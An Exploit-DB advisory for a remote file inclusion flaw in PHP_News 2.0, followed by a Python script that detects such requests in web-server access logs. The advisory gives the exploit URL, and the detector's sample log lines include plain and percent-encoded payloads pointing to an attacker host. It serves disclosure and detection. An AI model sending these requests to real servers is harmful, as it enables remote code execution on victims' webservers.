php_news 2.0 admin/catagory.php language Parameter Remote File Inclusion
2006-09-25T00:00:00
ID: EDB-ID:28689
Type: exploitdb
Reporter: Root3r_H3ll
Modified: 2006-09-25T00:00:00
Description
php_news 2.0 admin/catagory.php language Parameter Remote File Inclusion. Webapps exploit for php platform
source: http://www.securityfocus.com/bid/20209/info
PHP_News is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
PHP_News version 2.0 is vulnerable to these issues.
http://www.example.com/[path]/admin/catagory.php?language=attacker's_site
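A defender-side check for the request shape shown above, as an added example that is not part of the original advisory: it scans web-server access logs for requests to admin/catagory.php whose language parameter decodes to a URL, including nested percent-encoding. The log lines are constructed, and the rule that a legitimate language value is a short local name is an assumption made here, not something the advisory states.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

TARGET, PARAM = "/admin/catagory.php", "language"  # both named in the advisory
# Assumption: a legitimate value is a short local language name, e.g. "english".
SAFE_VALUE = re.compile(r"^[A-Za-z0-9_-]{1,32}$")
# A URL scheme or a protocol-relative "//host" prefix means a remote resource.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:|//)", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (%2568ttp -> %68ttp -> http)."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(line):
    """Return None (other request), 'ok', 'suspicious' or 'remote-include'."""
    match = REQUEST.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith(TARGET):
        return None
    verdict = None
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name.lower() != PARAM:
            continue
        value = fully_decode(value)  # parse_qsl already removed one layer
        if REMOTE.match(value):
            return "remote-include"
        if not SAFE_VALUE.match(value):
            verdict = "suspicious"
        elif verdict is None:
            verdict = "ok"
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every request that is not clean."""
    verdicts = ((n, classify(line)) for n, line in enumerate(lines, 1))
    return [(n, v) for n, v in verdicts if v in ("suspicious", "remote-include")]

# Constructed sample access-log lines (documentation addresses and hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Sep/2006:10:00:01 +0000] "GET /news/admin/catagory.php?language=english HTTP/1.1" 200 5120',
    '198.51.100.7 - - [25/Sep/2006:10:02:13 +0000] "GET /news/admin/catagory.php?language=http://attacker.example/x HTTP/1.1" 200 312',
    '198.51.100.7 - - [25/Sep/2006:10:02:20 +0000] "GET /news/admin/catagory.php?language=%2568ttp%253A%252F%252Fattacker.example%252Fx HTTP/1.1" 200 312',
    '192.0.2.10 - - [25/Sep/2006:10:03:00 +0000] "GET /news/index.php?language=http://attacker.example/ HTTP/1.1" 200 900',
    '192.0.2.44 - - [25/Sep/2006:10:04:41 +0000] "GET /news/admin/catagory.php?language=lang/english.inc HTTP/1.1" 200 5120',
]
```

A "suspicious" verdict means only that the value is not a plain name under the stated assumption; tune SAFE_VALUE to the language names the installation actually uses.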
References: https://www.exploit-db.com/exploits/28689/ (Exploit-DB), OSVDB 32317